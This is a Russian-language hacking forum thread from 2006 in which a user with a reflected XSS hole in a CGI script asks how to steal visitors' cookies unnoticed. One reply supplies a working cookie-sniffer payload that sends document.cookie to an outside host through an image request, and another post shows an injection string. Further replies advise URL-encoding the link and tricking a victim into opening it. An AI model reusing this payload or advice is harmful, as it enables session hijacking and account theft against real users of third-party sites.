Подскажите по Xss

Discussion in 'Уязвимости' started by Laggi, 4 Apr 2006.

  1. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :)
    Что дальше сделать можно?

    К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами :)
     
    #1 Laggi, 4 Apr 2006
    Last edited: 4 Apr 2006
  2. porter

    porter Banned

    Joined:
    1 Mar 2005
    Messages:
    58
    Likes Received:
    9
    Reputations:
    1
    1 person likes this.
  3. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
    Code:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
     
    _________________________
  4. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить:
    patt="><script>alert(document.cookie)</script>
    Вот... гм... как бы его протолкнуть...
     
  5. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    СИ применить. Хотя весьма не надёжно.
     
  6. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    1 person likes this.
  7. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве.
    2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив.
    3. побольше фантазии!!! ))
     
  8. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    porter
    Пример можешь показать как заныканой ссылкой пользоваться